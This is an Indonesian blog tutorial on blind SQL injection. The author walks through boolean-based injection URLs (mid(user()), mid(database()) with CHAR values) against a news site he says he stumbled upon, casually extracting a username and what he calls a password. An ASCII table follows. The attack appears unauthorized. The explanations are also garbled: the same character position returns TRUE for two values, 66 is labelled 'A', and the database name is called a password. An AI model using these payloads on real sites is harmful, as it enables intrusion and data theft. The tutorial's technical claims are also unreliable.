Blind SQL Injection

Saya akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang saya anggap rumit banget... Bukannya sok ngajarin atau apalah, disini saya hanya berusaha memberikan apa yang saya punya dan saya bisa...

Oke, bermula dari kangennya saya pada yayank ampe akhirnya saking kangennya tangan ini bergerak untuk mencari dan mencari (HeHeHe…maksa banget alasannya…). Akhirnya tanpa sengaja saya nyangkut ke situs luar...Anggep aja situs tersebut bernama http://www.YogyaFreeMakassar.com/news.php?id=90232

Nah pada target saya kali ini, saya menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...

Langsung aja saya ketik

http://www.YogyaFreeMakassar.com/news.php?id=90232 and 1=0

dan ternyata hasilnya adalah FALSE

http://www.YogyaFreeMakassar.com/news.php?id=90232 and 1=1

bernilai TRUE

Nah setelah saya yakin kalo web tersebut vulnerable maka saya injeksi a.k.a suntik (hehehe...)

http://www.YogyaFreeMakassar.com/news.php?id=90232 and mid(user(),1,1)=CHAR(65)

Nah penjelasannya supaya semua pada ngerti (hehehehe...orang saya juga baru belajar, sok ngasih tau mode ON BANGET...) saya akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...

mid(user()1,1) artinya dalam kasus ini saya tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" saya sengaja kosongkan.

1,1 adalah urutan dari value tersebut.

CHAR adalah perubah dalam desimal

65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII jadi… saya akan mengawalinya dengan 65

Nah kalo dah begini apa yang akan terjadi…??? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti saya harus memasukkan nilai yang lain agar menjadi true...

TRUE

http://www.YogyaFreeMakassar.com/news.php?id=90232 and mid(user(),1,1)=CHAR(65)

TRUE

http://www.YogyaFreeMakassar.com/news.php?id=90232 and mid(user(),1,1)=CHAR(66)

Ternyata pada kasus ini web yang di isengi ini memiliki true (enaknya kalau webnya kek gini...HeHeHe...) dan nilai tersebut adalah 65 dan 66 (A dan B dalam ASCII) Cari nilai kedua dan caranya adalah...

http://www.YogyaFreeMakassar.com/news.php?id=90232 and mid(user(),1,2)=CHAR(66,65)

Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...

Nah akhirnya saya mendapat nilai true pada angka ke 66 (A dalam ASCII)

Lanjutin aja sampe dapet nilai atau value user itu habis tersisa (Jaaat banget main habis tersisa…!!!)

dan sampai akhirnya menjadi

http://www.YogyaFreeMakassar.com/news.php?id=90232 and mid(user(),1,4)=CHAR(65,66,66,72)

kita urut hasil kita (serasa seperti sekolah main angka²an…HeHeHe)

65 = A

66 = B

66 = A

72 = H

Ternyata username-nya adalah ABAH (HeHeHe... Kebetulan yang sangat dipaksakan). Nah untuk cari passwordnya saya tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...

Contoh:

http://www.YogyaFreeMakassar.com/news.php?id=90232 and mid

mid(database(),1,13)=CHAR(83,65,89,65,78,71,72,69,76,76,72,65,71)

Jadi password yang didapat adalah...

83 = S

65 = A

89 = Y

65 = A

78 = N

71 = G

72 = H

69 = E

76 = L

76 = L

72 = H

65 = A

71 = G

Jadi username dan passwordnya adalah ABAH dan SAYANGHELLHAG...HaHaHa…enak ya kalau gini WaKaKa…

Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu saya belom nyampe situ...

Berikut adalah konversi ascii ke decimal

000 --�--	001 -- --	002 ----	003 ----	004 ----	005 ----
006 ----	007 ----	008 ----	009 -- --	010 -- --	011 -- --
012 -- --	013 -- --	014 ----	015 ----	016 ----	017 ----
018 ----	019 ----	020 ----	021 ----	022 ----	023 ----
024 ----	025 ----	026 ----	027 ----	028 ----	029 ----
030 ----	031 ----	032 -- --	033 --!--	034 --"--	035 --#--
036 --$--	037 --%--	038 --&--	039 --'--	040 --(--	041 --)--
042 --*--	043 --+--	044 --,--	045 -----	046 --.--	047 --/--
048 --0--	049 --1--	050 --2--	051 --3--	052 --4--	053 --5--
054 --6--	055 --7--	056 --8--	057 --9--	058 --:--	059 --;--
060 --<--	061 --=--	062 -->--	063 --?--	064 --@--	065 --A--
066 --B--	067 --C--	068 --D--	069 --E--	070 --F--	071 --G--
072 --H--	073 --I--	074 --J--	075 --K--	076 --L--	077 --M--
078 --N--	079 --O--	080 --P--	081 --Q--	082 --R--	083 --S--
084 --T--	085 --U--	086 --V--	087 --W--	088 --X--	089 --Y--
090 --Z--	091 --[--	092 --\--	093 --]--	094 --^--	095 --_--
096 --`--	097 --a--	098 --b--	099 --c--	100 --d--	101 --e--
102 --f--	103 --g--	104 --h--	105 --i--	106 --j--	107 --k--
108 --l--	109 --m--	110 --n--	111 --o--	112 --p--	113 --q--
114 --r--	115 --s--	116 --t--	117 --u--	118 --v--	119 --w--
120 --x--	121 --y--	122 --z--	123 --{--	124 --|--	125 --}--
126 --~--	127 ----	128 --€--	129 --�--	130 --‚--	131 --ƒ--
132 --„--	133 --…--	134 --†--	135 --‡--	136 --ˆ--	137 --‰--
138 --Š--	139 --‹--	140 --Œ--	141 --�--	142 --Ž--	143 --�--
144 --�--	145 --‘--	146 --’--	147 --“--	148 --”--	149 --•--
150 --–--	151 --—--	152 --˜--	153 --™--	154 --š--	155 --›--
156 --œ--	157 --�--	158 --ž--	159 --Ÿ--	160 -- --	161 --¡--
162 --¢--	163 --£--	164 --¤--	165 --¥--	166 --¦--	167 --§--
168 --¨--	169 --©--	170 --ª--	171 --«--	172 --¬--	173 --­--
174 --®--	175 --¯--	176 --°--	177 --±--	178 --²--	179 --³--
180 --´--	181 --µ--	182 --¶--	183 --·--	184 --¸--	185 --¹--
186 --º--	187 --»--	188 --¼--	189 --½--	190 --¾--	191 --¿--
192 --À--	193 --Á--	194 --Â--	195 --Ã--	196 --Ä--	197 --Å--
198 --Æ--	199 --Ç--	200 --È--	201 --É--	202 --Ê--	203 --Ë--
204 --Ì--	205 --Í--	206 --Î--	207 --Ï--	208 --Ð--	209 --Ñ--
210 --Ò--	211 --Ó--	212 --Ô--	213 --Õ--	214 --Ö--	215 --×--
216 --Ø--	217 --Ù--	218 --Ú--	219 --Û--	220 --Ü--	221 --Ý--
222 --Þ--	223 --ß--	224 --à--	225 --á--	226 --â--	227 --ã--
228 --ä--	229 --å--	230 --æ--	231 --ç--	232 --è--	233 --é--
234 --ê--	235 --ë--	236 --ì--	237 --í--	238 --î--	239 --ï--
240 --ð--	241 --ñ--	242 --ò--	243 --ó--	244 --ô--	245 --õ--
246 --ö--	247 --÷--	248 --ø--	249 --ù--	250 --ú--	251 --û--
252 --ü--	253 --ý--	254 --þ--	255 --ÿ--	256 --?--	gjb --?gjb;--

Baca juga artikel menarik lainnya :